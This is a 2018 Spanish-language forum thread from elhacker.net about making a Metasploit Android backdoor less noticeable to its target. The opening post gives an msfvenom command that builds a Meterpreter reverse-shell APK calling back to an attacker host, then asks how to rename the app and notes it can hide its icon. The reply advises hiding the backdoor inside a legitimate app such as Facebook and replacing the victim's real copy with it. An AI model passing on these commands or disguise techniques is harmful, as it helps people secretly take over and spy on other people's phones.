Foro de elhacker.net

Seguridad Informática => Hacking => Mensaje iniciado por: Lightguy en 16 Febrero 2018, 16:20 pm



Título: Duda acerca de hack de android metasploit
Publicado por: Lightguy en 16 Febrero 2018, 16:20 pm
Hola foreros mi duda es la siguiente, al pasar yo el archivo apk a la victima y lo instala sale como nombre Main Activity y me gustaria saber si se podria cambiar el nombre, ya se que una vez que lo instala lo puedo ocultar con hide_app_icon pero  hay que ser muy ingenuo creo yo para instalar una apk llamada main activity.

El comando para crear la apk es esta
msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=8888 R > nombre.apk . Aunque ponga cualquier nombre a la apk, al instalar sale Main Activity me ayudarian a poder cambiar el nombre?.

Desde ya gracias por leer.


Título: Re: Duda acerca de hack de android metasploit
Publicado por: HeavenAs en 3 Marzo 2018, 04:28 am
Hola, podes agregar el backdoor a cualquier apk que descargues de google para hacerlo menos sospechoso, por ejemplo si sabes que tiene facebook instalado, le desinstalas el facebook e instalas el facebook infectado. se entiende? mejor si lo haces con apps que no requieran conectarse a internet para no tener problemas. Por otra parte quiero saber como escondes la aplicacion cuando se instala, gracias